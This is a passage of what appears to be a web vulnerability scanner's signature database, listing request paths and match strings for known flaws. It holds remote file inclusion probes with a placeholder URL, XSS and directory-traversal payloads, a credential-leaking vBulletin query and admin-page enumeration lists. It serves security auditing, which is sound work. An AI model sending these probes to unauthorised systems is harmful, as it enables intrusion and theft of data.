"006143","5292","c","/web/login.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006144","5292","c","/web/logout.php?LIBSDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006145","5292","c","/web/lom.php?ETCDIR=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006146","5292","c","/web/network_module_selector.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006147","5292","c","/web/submit_abuse.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006148","5292","c","/web/submit_comment.php?path_prefix=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006149","5292","c","/webavis/class/class.php?root=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006150","5292","c","/webavis/class/class.php?root=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006151","5292","c","/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006152","5292","c","/webnews/template.php?content_page=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006153","5292","c","/webroot/css.php?CONFIGS=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006154","5292","c","/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006155","5292","c","/webyep-system/programm/webyep.php?webyep_sIncludePath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006156","5292","c","/window.php?action=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006157","5292","c","/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006158","5292","c","/work/index.php?g_include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006159","5292","c","/work/module/forum/forum.php?g_include=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006160","5292","c","/worldpay_notify.php?mosConfig_absolute_path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006161","5292","c","/wp-cache-phase1.php?plugin=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006162","5292","c","/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006163","5292","c","/wp-content/plugins/myflash/myflash-button.php?wpPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006164","5292","c","/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006165","5292","c","/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006166","5292","c","/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006167","5292","c","/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006168","5292","c","/wsk/wsk.php?wsk=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006169","5292","c","/xarg_corner.php?xarg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006170","5292","c","/xarg_corner_bottom.php?xarg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006171","5292","c","/xarg_corner_top.php?xarg=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006172","5292","c","/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL&2093085906=1&995617320=2","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006173","5292","c","/xoopsgallery/init_basic.php?GALLERY_BASEDIR=@RFIURL?&2093085906=1&995617320=2","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006174","5292","c","/xt_counter.php?server_base_dir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006175","5292","c","/yabbse/Sources/Packages.php?sourcedir=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006176","5292","c","/yacs/scripts/update_trailer.php?context[path_to_root]=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006177","5292","c","/yrch/plugins/metasearch/plug.inc.php?path=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006178","5292","c","/ytb/cuenta/cuerpo.php?base_archivo=@RFIURL","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006179","5292","c","/zipndownload.php?PP_PATH=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006180","5292","c","/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=@RFIURL?","GET","PHP Version","","","","","RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/","",""
"006181","0","3","/wp-content/plugins/akismet/readme.txt","GET","Tested up to","","","","","The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version","",""
"006182","62684","3","/wp-content/plugins/hello.php","GET","Call to undefined function add_action\(\) in ","","","","","The WordPress hello.php plugin reveals a file system path","",""
"006183","0","3","/readme.html","GET","Version ","","5-minute install","","","This WordPress file reveals the installed version.","",""
"006184","0","3","/wp-links-opml.php","GET","generator=\"WordPress\/","","","","","This WordPress script reveals the installed version.","",""
"006184","3093","1","/includes/db.inc","GET","200","<\?php","","","","Include files (.inc) should not be served in plain text.","",""
"006185","3093","1","/includes/sendmail.inc","GET","200","<\?php","","","","Include files (.inc) should not be served in plain text.","",""
"006186","3092","1b","/license.txt","GET","200","","","","","License file found may identify site software.","",""
"006187","3092","1b","/install.txt","GET","200","","","","","Install file found may identify site software.","",""
"006188","3092","1b","/LICENSE.TXT","GET","200","","","","","License file found may identify site software.","",""
"006189","3092","1b","/INSTALL.TXT","GET","200","","","","","Install file found may identify site software.","",""
"006190","3092","1b","/READ_THIS_FIRST.txt","GET","Welcome to ExpressionEngine","","","","","An ExpressionEngine readme file has been found.","",""
"006191","0","3","/wp-app.log","GET","Array","LANG","","","","Wordpress' wp-app.log may leak application/system details.","",""
"006192","0","3","/_vti_bin/_vti_adm/admin.dll","GET","osstatus=","","","specified module could not be found","","FrontPage/SharePoint file found.","",""
"006193","58472","3","/read/rss?forum=nonexistant&rev=0.92","GET","no such element in array","","","","","Lyris ListManager error information disclosure.","",""
"006194","58472","3","/subscribe/survey~1.tml","GET","Database error inf","","","","","Lyris ListManager error information disclosure.","",""
"006195","58463","4","/scripts/message/message_dialog.tml?how_many_back=\"><script>alert(1)</script>","GET","<script>alert\(1\)<\/script>","","","","","Lyris ListManager Cross-Site Scripting.","",""
"006196","58464","04","/read/attach_file.tml?page=http://cirt.net/","GET","action=\"http:\/\/cirt\.net","","","","","Lyris ListManager XSRF/File Upload.","",""
"006197","0","23","/config/config.txt","GET","200","","","","","Configuration file found.","",""
"006198","0","23","/htaccess.txt","GET","RewriteEngine On","","","","","Default Joomla! htaccess.txt file found. This should be removed or renamed.","",""
"006199","0","1b","/typo3/","GET","200","","c-password","","","Typo3 login found","",""
"006200","0","12","@CGIDIRSphp.ini","GET","\[PHP\]","","","","","php.ini file found","",""
"006201","0","3","/ConversionReport.txt","GET","This report shows","","","","","A report file from an ASP.NET 1.1 conversion to an ASP.NET 2.0 project was found and may reveal sensitive information.","",""
"006202","0","b","/cadence/","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess was found.","",""
"006204","0","3","/cadence/webaccess.net","GET","Failed connection","","","","","Cadre Technologies Cadence WebAccess may reveal a database name due to it being offline or misconfigured.","",""
"006205","0","2","/config/readme.txt","GET","200","","","","","Readme file found.","",""
"006206","0","2","/data/readme.txt","GET","200","","","","","Readme file found.","",""
"006207","0","2","/log/readme.txt","GET","200","","","","","Readme file found.","",""
"006208","0","2","/logs/readme.txt","GET","200","","","","","Readme file found.","",""
"006209","0","2","/uploads/readme.txt","GET","200","","","","","Readme file found.","",""
"006210","0","b","/cadence/help/help.htm","GET","Cadre Technologies","","","","","Cadre Technologies Cadence WebAccess help files found.","",""
"006211","0","b","/","GET","img src=\"welcome\.png\" alt=\"IIS7\"","","","","","Appears to be a default IIS 7 install.","",""
"006212","0","3","/install/install.aspx","GET","dtsoftware\&nbsp;Configuration","","","","","dtsoftware 404 page reveals detailed application information.","",""
"006213","0","23","/webresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","",""
"006214","0","23","/scriptresource.axd?d=junk","GET","NET Framework Version:","","Invalid viewstate\.","","","ASP.NET reveals its version in error messages when verbose debugging is enabled.","",""
"006215","0","1","/admin1.php","GET","200","","","","","Admin login page found.","",""
"006217","0","1","/admin.asp","GET","200","","","","","Admin login page/section found.","",""
"006218","0","1","/admin/account.asp","GET","200","","","","","Admin login page/section found.","",""
"006219","0","1","/admin/account.html","GET","200","","","","","Admin login page/section found.","",""
"006220","0","1","/admin/account.php","GET","200","","","","","Admin login page/section found.","",""
"006221","0","1","/admin/controlpanel.asp","GET","200","","","","","Admin login page/section found.","",""
"006222","0","1","/admin/controlpanel.html","GET","200","","","","","Admin login page/section found.","",""
"006223","0","1","/admin/controlpanel.php","GET","200","","","","","Admin login page/section found.","",""
"006224","0","1","/admin/cp.asp","GET","200","","","","","Admin login page/section found.","",""
"006225","0","1","/admin/cp.html","GET","200","","","","","Admin login page/section found.","",""
"006226","0","1","/admin/cp.php","GET","200","","","","","Admin login page/section found.","",""
"006227","0","1","/admin/home.asp","GET","200","","","","","Admin login page/section found.","",""
"006228","0","1","/admin/home.php","GET","200","","","","","Admin login page/section found.","",""
"006229","0","1","/admin/index.asp","GET","200","","","","","Admin login page/section found.","",""
"006230","0","1","/admin/index.html","GET","200","","","","","Admin login page/section found.","",""
"006231","0","1","/admin/login.asp","GET","200","","","","","Admin login page/section found.","",""
"006232","0","1","/admin/login.html","GET","200","","","","","Admin login page/section found.","",""
"006233","0","1","/admin/login.php","GET","200","","","","","Admin login page/section found.","",""
"006234","0","1","/admin1.asp","GET","200","","","","","Admin login page/section found.","",""
"006235","0","1","/admin1.html","GET","200","","","","","Admin login page/section found.","",""
"006236","0","1","/admin1/","GET","200","","","","","Admin login page/section found.","",""
"006237","0","1","/admin2.asp","GET","200","","","","","Admin login page/section found.","",""
"006238","0","1","/admin2.html","GET","200","","","","","Admin login page/section found.","",""
"006239","0","1","/admin2.php","GET","200","","","","","Admin login page/section found.","",""
"006240","0","1","/admin4_account/","GET","200","","","","","Admin login page/section found.","",""
"006241","0","1","/admin4_colon/","GET","200","","","","","Admin login page/section found.","",""
"006242","0","1","/admincontrol.asp","GET","200","","","","","Admin login page/section found.","",""
"006243","0","1","/admincontrol.html","GET","200","","","","","Admin login page/section found.","",""
"006244","0","1","/admincontrol.php","GET","200","","","","","Admin login page/section found.","",""
"006245","0","1","/administer/","GET","200","","","","","Admin login page/section found.","",""
"006246","0","1","/administr8.asp","GET","200","","","","","Admin login page/section found.","",""
"006247","0","1","/administr8.html","GET","200","","","","","Admin login page/section found.","",""
"006248","0","1","/administr8.php","GET","200","","","","","Admin login page/section found.","",""
"006249","0","1","/administr8/","GET","200","","","","","Admin login page/section found.","",""
"006250","0","1","/administracao.php","GET","200","","","","","Admin login page/section found.","",""
"006251","0","1","/administraçao.php","GET","200","","","","","Admin login page/section found.","",""
"006252","0","1","/administracao/","GET","200","","","","","Admin login page/section found.","",""
"006253","0","1","/administraçao/","GET","200","","","","","Admin login page/section found.","",""
"006254","0","1","/administracion.php","GET","200","","","","","Admin login page/section found.","",""
"006255","0","1","/administracion/","GET","200","","","","","Admin login page/section found.","",""
"006256","0","1","/administrateur.php","GET","200","","","","","Admin login page/section found.","",""
"006257","0","1","/administrateur/","GET","200","","","","","Admin login page/section found.","",""
"006258","0","1","/administratie/","GET","200","","","","","Admin login page/section found.","",""
"006259","0","1","/administration.html","GET","200","","","","","Admin login page/section found.","",""
"006260","0","1","/administration.php","GET","200","","","","","Admin login page/section found.","",""
"006261","0","1","/administration/","GET","200","","","","","Admin login page/section found.","",""
"006262","0","1","/administrator.asp","GET","200","","","","","Admin login page/section found.","",""
"006263","0","1","/administrator.html","GET","200","","","","","Admin login page/section found.","",""
"006264","0","1","/administrator.php","GET","200","","","","","Admin login page/section found.","",""
"006265","0","1","/administrator/account.asp","GET","200","","","","","Admin login page/section found.","",""
"006266","0","1","/administrator/account.html","GET","200","","","","","Admin login page/section found.","",""
"006267","0","1","/administrator/account.php","GET","200","","","","","Admin login page/section found.","",""
"006268","0","1","/administrator/index.asp","GET","200","","","","","Admin login page/section found.","",""
"006269","0","1","/administrator/index.html","GET","200","","","","","Admin login page/section found.","",""
"006270","0","1","/administrator/index.php","GET","200","","","","","Admin login page/section found.","",""
"006271","0","1","/administrator/login.asp","GET","200","","","","","Admin login page/section found.","",""
"006272","0","1","/administrator/login.html","GET","200","","","","","Admin login page/section found.","",""
"006273","0","1","/administrator/login.php","GET","200","","","","","Admin login page/section found.","",""
"006274","0","1","/administratoraccounts/","GET","200","","","","","Admin login page/section found.","",""
"006275","0","1","/administrators/","GET","200","","","","","Admin login page/section found.","",""
"006276","0","1","/administrivia/","GET","200","","","","","Admin login page/section found.","",""
"006277","0","1","/adminisztrátora.php","GET","200","","","","","Admin login page/section found.","",""
"006278","0","1","/adminisztrátora/","GET","200","","","","","Admin login page/section found.","",""
"006279","0","1","/adminpanel.asp","GET","200","","","","","Admin login page/section found.","",""
"006280","0","1","/adminpanel.html","GET","200","","","","","Admin login page/section found.","",""
"006281","0","1","/adminpanel.php","GET","200","","","","","Admin login page/section found.","",""
"006282","0","1","/adminpro/","GET","200","","","","","Admin login page/section found.","",""
"006283","0","1","/admins.asp","GET","200","","","","","Admin login page/section found.","",""
"006284","0","1","/admins.html","GET","200","","","","","Admin login page/section found.","",""
"006285","0","1","/admins.php","GET","200","","","","","Admin login page/section found.","",""
"006286","0","1","/admins/","GET","200","","","","","Admin login page/section found.","",""
"006287","0","1","/AdminTools/","GET","200","","","","","Admin login page/section found.","",""
"006288","0","1","/amministratore.php","GET","200","","","","","Admin login page/section found.","",""
"006289","0","1","/amministratore/","GET","200","","","","","Admin login page/section found.","",""
"006290","0","1","/autologin/","GET","200","","","","","Admin login page/section found.","",""
"006291","0","1","/banneradmin/","GET","200","","","","","Admin login page/section found.","",""
"006292","0","1","/bbadmin/","GET","200","","","","","Admin login page/section found.","",""
"006293","0","1","/beheerder.php","GET","200","","","","","Admin login page/section found.","",""
"006294","0","1","/beheerder/","GET","200","","","","","Admin login page/section found.","",""
"006295","0","1","/bigadmin/","GET","200","","","","","Admin login page/section found.","",""
"006296","0","1","/blogindex/","GET","200","","","","","Admin login page/section found.","",""
"006297","0","1","/cadmins/","GET","200","","","","","Admin login page/section found.","",""
"006298","0","1","/ccms/","GET","200","","","","","Admin login page/section found.","",""
"006299","0","1","/ccms/index.php","GET","200","","","","","Admin login page/section found.","",""
"006300","0","1","/ccms/login.php","GET","200","","","","","Admin login page/section found.","",""
"006301","0","1","/ccp14admin/","GET","200","","","","","Admin login page/section found.","",""
"006302","0","1","/cmsadmin/","GET","200","","","","","Admin login page/section found.","",""
"006303","0","1","/configuration/","GET","200","","","","","Admin login page/section found.","",""
"006304","0","1","/configure/","GET","200","","","","","Admin login page/section found.","",""
"006305","0","1","/controlpanel.asp","GET","200","","","","","Admin login page/section found.","",""
"006306","0","1","/controlpanel.html","GET","200","","","","","Admin login page/section found.","",""
"006307","0","1","/controlpanel.php","GET","200","","","","","Admin login page/section found.","",""
"006308","0","1","/controlpanel/","GET","200","","","","","Admin login page/section found.","",""
"006309","0","1","/cp.asp","GET","200","","","","","Admin login page/section found.","",""
"006310","0","1","/cp.html","GET","200","","","","","Admin login page/section found.","",""
"006311","0","1","/cp.php","GET","200","","","","","Admin login page/section found.","",""
"006312","0","1","/cpanel_file/","GET","200","","","","","Admin login page/section found.","",""
"006313","0","1","/customer_login/","GET","200","","","","","Admin login page/section found.","",""
"006314","0","1","/database_administration/","GET","200","","","","","Admin login page/section found.","",""
"006315","0","1","/Database_Administration/","GET","200","","","","","Admin login page/section found.","",""
"006316","0","1","/dir-login/","GET","200","","","","","Admin login page/section found.","",""
"006317","0","1","/directadmin/","GET","200","","","","","Admin login page/section found.","",""
"006318","0","1","/ezsqliteadmin/","GET","200","","","","","Admin login page/section found.","",""
"006319","0","1","/fileadmin.asp","GET","200","","","","","Admin login page/section found.","",""
"006320","0","1","/fileadmin.html","GET","200","","","","","Admin login page/section found.","",""
"006321","0","1","/fileadmin.php","GET","200","","","","","Admin login page/section found.","",""
"006322","0","1","/formslogin/","GET","200","","","","","Admin login page/section found.","",""
"006323","0","1","/globes_admin/","GET","200","","","","","Admin login page/section found.","",""
"006324","0","1","/hpwebjetadmin/","GET","200","","","","","Admin login page/section found.","",""
"006325","0","1","/Indy_admin/","GET","200","","","","","Admin login page/section found.","",""
"006326","0","1","/irc-macadmin/","GET","200","","","","","Admin login page/section found.","",""
"006327","0","1","/LiveUser_Admin/","GET","200","","","","","Admin login page/section found.","",""
"006328","0","1","/login_db/","GET","200","","","","","Admin login page/section found.","",""
"006329","0","1","/login-redirect/","GET","200","","","","","Admin login page/section found.","",""
"006330","0","1","/login-us/","GET","200","","","","","Admin login page/section found.","",""
"006331","0","1","/login.asp","GET","200","","","","","Admin login page/section found.","",""
"006332","0","1","/login.html","GET","200","","","","","Admin login page/section found.","",""
"006333","0","1","/login.php","GET","200","","","","","Admin login page/section found.","",""
"006334","0","1","/login1/","GET","200","","","","","Admin login page/section found.","",""
"006335","0","1","/loginflat/","GET","200","","","","","Admin login page/section found.","",""
"006336","0","1","/logo_sysadmin/","GET","200","","","","","Admin login page/section found.","",""
"006337","0","1","/Lotus_Domino_Admin/","GET","200","","","","","Admin login page/section found.","",""
"006338","0","1","/macadmin/","GET","200","","","","","Admin login page/section found.","",""
"006339","0","1","/maintenance/","GET","200","","","","","Admin login page/section found.","",""
"006340","0","1","/manuallogin/","GET","200","","","","","Admin login page/section found.","",""
"006341","0","1","/memlogin/","GET","200","","","","","Admin login page/section found.","",""
"006342","0","1","/meta_login/","GET","200","","","","","Admin login page/section found.","",""
"006343","0","1","/modelsearch/login.asp","GET","200","","","","","Admin login page/section found.","",""
"006344","0","1","/modelsearch/login.php","GET","200","","","","","Admin login page/section found.","",""
"006345","0","1","/moderator.asp","GET","200","","","","","Admin login page/section found.","",""
"006346","0","1","/moderator.html","GET","200","","","","","Admin login page/section found.","",""
"006347","0","1","/moderator.php","GET","200","","","","","Admin login page/section found.","",""
"006348","0","1","/moderator/","GET","200","","","","","Admin login page/section found.","",""
"006349","0","1","/moderator/admin.asp","GET","200","","","","","Admin login page/section found.","",""
"006350","0","1","/moderator/admin.html","GET","200","","","","","Admin login page/section found.","",""
"006351","0","1","/moderator/admin.php","GET","200","","","","","Admin login page/section found.","",""
"006352","0","1","/moderator/login.asp","GET","200","","","","","Admin login page/section found.","",""
"006353","0","1","/moderator/login.html","GET","200","","","","","Admin login page/section found.","",""
"006354","0","1","/moderator/login.php","GET","200","","","","","Admin login page/section found.","",""
"006355","0","1","/myadmin/","GET","200","","","","","Admin login page/section found.","",""
"006356","0","1","/navSiteAdmin/","GET","200","","","","","Admin login page/section found.","",""
"006357","0","1","/newsadmin/","GET","200","","","","","Admin login page/section found.","",""
"006358","0","1","/openvpnadmin/","GET","200","","","","","Admin login page/section found.","",""
"006359","0","1","/painel/","GET","200","","","","","Admin login page/section found.","",""
"006360","0","1","/panel/","GET","200","","","","","Admin login page/section found.","",""
"006361","0","1","/pgadmin/","GET","200","","","","","Admin login page/section found.","",""
"006362","0","1","/phpldapadmin/","GET","200","","","","","Admin login page/section found.","",""
"006363","0","1","/phppgadmin/","GET","200","","","","","Admin login page/section found.","",""
"006364","0","1","/phpSQLiteAdmin/","GET","200","","","","","Admin login page/section found.","",""
"006365","0","1","/platz_login/","GET","200","","","","","Admin login page/section found.","",""
"006366","0","1","/power_user/","GET","200","","","","","Admin login page/section found.","",""
"006367","0","1","/project-admins/","GET","200","","","","","Admin login page/section found.","",""
"006368","0","1","/pureadmin/","GET","200","","","","","Admin login page/section found.","",""
"006369","0","1","/radmind-1/","GET","200","","","","","Admin login page/section found.","",""
"006370","0","1","/radmind/","GET","200","","","","","Admin login page/section found.","",""
"006371","0","1","/rcLogin/","GET","200","","","","","Admin login page/section found.","",""
"006372","0","1","/server_admin_small/","GET","200","","","","","Admin login page/section found.","",""
"006373","0","1","/Server.asp","GET","200","","","","","Admin login page/section found.","",""
"006374","0","1","/Server.html","GET","200","","","","","Admin login page/section found.","",""
"006375","0","1","/Server.php","GET","200","","","","","Admin login page/section found.","",""
"006376","0","1","/ServerAdministrator/","GET","200","","","","","Admin login page/section found.","",""
"006377","0","1","/showlogin/","GET","200","","","","","Admin login page/section found.","",""
"006378","0","1","/simpleLogin/","GET","200","","","","","Admin login page/section found.","",""
"006379","0","1","/smblogin/","GET","200","","","","","Admin login page/section found.","",""
"006380","0","1","/sql-admin/","GET","200","","","","","Admin login page/section found.","",""
"006381","0","1","/ss_vms_admin_sm/","GET","200","","","","","Admin login page/section found.","",""
"006382","0","1","/sshadmin/","GET","200","","","","","Admin login page/section found.","",""
"006383","0","1","/staradmin/","GET","200","","","","","Admin login page/section found.","",""
"006384","0","1","/sub-login/","GET","200","","","","","Admin login page/section found.","",""
"006385","0","1","/Super-Admin/","GET","200","","","","","Admin login page/section found.","",""
"006386","0","1","/support_login/","GET","200","","","","","Admin login page/section found.","",""
"006387","0","1","/sys-admin/","GET","200","","","","","Admin login page/section found.","",""
"006388","0","1","/sysadmin.asp","GET","200","","","","","Admin login page/section found.","",""
"006389","0","1","/sysadmin.html","GET","200","","","","","Admin login page/section found.","",""
"006390","0","1","/sysadmin.php","GET","200","","","","","Admin login page/section found.","",""
"006391","0","1","/sysadmin/","GET","200","","","","","Admin login page/section found.","",""
"006392","0","1","/SysAdmin/","GET","200","","","","","Admin login page/section found.","",""
"006393","0","1","/SysAdmin2/","GET","200","","","","","Admin login page/section found.","",""
"006394","0","1","/sysadmins/","GET","200","","","","","Admin login page/section found.","",""
"006395","0","1","/system_administration/","GET","200","","","","","Admin login page/section found.","",""
"006396","0","1","/system-administration/","GET","200","","","","","Admin login page/section found.","",""
"006398","0","1","/ur-admin.asp","GET","200","","","","","Admin login page/section found.","",""
"006399","0","1","/ur-admin.html","GET","200","","","","","Admin login page/section found.","",""
"006400","0","1","/ur-admin.php","GET","200","","","","","Admin login page/section found.","",""
"006401","0","1","/ur-admin/","GET","200","","","","","Admin login page/section found.","",""
"006402","0","1","/useradmin/","GET","200","","","","","Admin login page/section found.","",""
"006403","0","1","/UserLogin/","GET","200","","","","","Admin login page/section found.","",""
"006404","0","1","/utility_login/","GET","200","","","","","Admin login page/section found.","",""
"006405","0","1","/v2/painel/","GET","200","","","","","Admin login page/section found.","",""
"006406","0","1","/vadmind/","GET","200","","","","","Admin login page/section found.","",""
"006407","0","1","/vmailadmin/","GET","200","","","","","Admin login page/section found.","",""
"006408","0","1","/webadmin.asp","GET","200","","","","","Admin login page/section found.","",""
"006409","0","1","/webadmin.html","GET","200","","","","","Admin login page/section found.","",""
"006410","0","1","/webadmin.php","GET","200","","","","","Admin login page/section found.","",""
"006411","0","1","/webmaster/","GET","200","","","","","Admin login page/section found.","",""
"006412","0","1","/websvn/","GET","200","","","","","Admin login page/section found.","",""
"006413","0","1","/wizmysqladmin/","GET","200","","","","","Admin login page/section found.","",""
"006414","0","1","/wp-admin/","GET","200","","","","","Admin login page/section found.","",""
"006415","0","1","/wp-login/","GET","200","","","","","Admin login page/section found.","",""
"006416","0","1","/xlogin/","GET","200","","","","","Admin login page/section found.","",""
"006417","0","1","/yonetici.asp","GET","200","","","","","Admin login page/section found.","",""
"006418","0","1","/yonetici.html","GET","200","","","","","Admin login page/section found.","",""
"006419","0","1","/yonetici.php","GET","200","","","","","Admin login page/section found.","",""
"006420","0","1","/yonetim.asp","GET","200","","","","","Admin login page/section found.","",""
"006421","0","1","/yonetim.html","GET","200","","","","","Admin login page/section found.","",""
"006422","0","1","/yonetim.php","GET","200","","","","","Admin login page/section found.","",""
"006423","3092","1","/test.asp","GET","200","","","","","This might be interesting...","",""
"006424","3092","1","/test.aspx","GET","200","","","","","This might be interesting...","",""
"006425","3092","1","/test.php","GET","200","","","","","This might be interesting...","",""
"006426","0","1","/maintenance.asp","GET","200","","","","","This might be interesting...","",""
"006427","0","1","/maintenance.aspx","GET","200","","","","","This might be interesting...","",""
"006429","0","1","/maint/","GET","200","","","","","This might be interesting...","",""
"006430","0","1","/maint.asp","GET","200","","","","","This might be interesting...","",""
"006431","0","1","/maint.aspx","GET","200","","","","","This might be interesting...","",""
"006432","59440","57","/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml","GET","200","","","","","VMWare ESX is vulnerable to a directory traversal attack.","",""
"006433","39003","4","/","<script>alert(1)</script>","413","","<script>alert\(1\)<\/script>","","","Apache HTTP Server 2.0.x and 2.2.x<script>alert(1)</script>","",""
"006434","0","3","/jk-status","GET","200","","","","","mod_jk status page is visible.","",""
"006435","0","3","/balancer-manager","GET","200","","","","","mod_proxy_balancer management page is visible.","",""
"006437","0","1","/servlets-examples/","GET","200","","","","","Tomcat servlets examples are visible.","",""
"006438","0","1","/admin-console","GET","200","","","","","JBoss admin console is visible.","",""
"006439","0","13","/webmail/src/configtest.php","GET","SquirrelMail configtest","","","","","Squirrelmail configuration test may reveal version and system info.","",""
"006440","0","23","@CGIDIRSawstats.pl","GET","SiteDomain parameter","","","","","AWStats logfile analyzer is misconfigured.","",""
"006441","0","2","@CGIDIRSawredir.pl","GET","200","","","","","AWStats redirection file.","",""
"006442","0","1","/help.php","GET","200","","","","","A help file was found.","",""
"006443","0","b","/wordpress/","GET","\/wp-content\/","","","","","A Wordpress installation was found.","",""
"006445","66505","3","/forum/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database<\/span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","",""
"006446","66505","3","/faq.php?s=&do=search&q=database&match=all&titlesonly=0","GET","Database<\/span> Name:","","","","","vBulletin 3.6.8 contains a vulnerability that reveals the database credentials via a FAQ search. See http://www.vbulletin.com/forum/showthread.php?357818-Security-Patch-Release-3.8.6-PL1","",""
"006447","0","2b","/wconnect/admin.html","GET","e-SPS Web","","","","","American Software e-SPS admin section found.","",""
"006448","0","18","/open.txt","GET","Fx29ID","","","","","Payload for Fx29ID RFI exploit. The server may have been compromised to act as a repository for this file.","",""
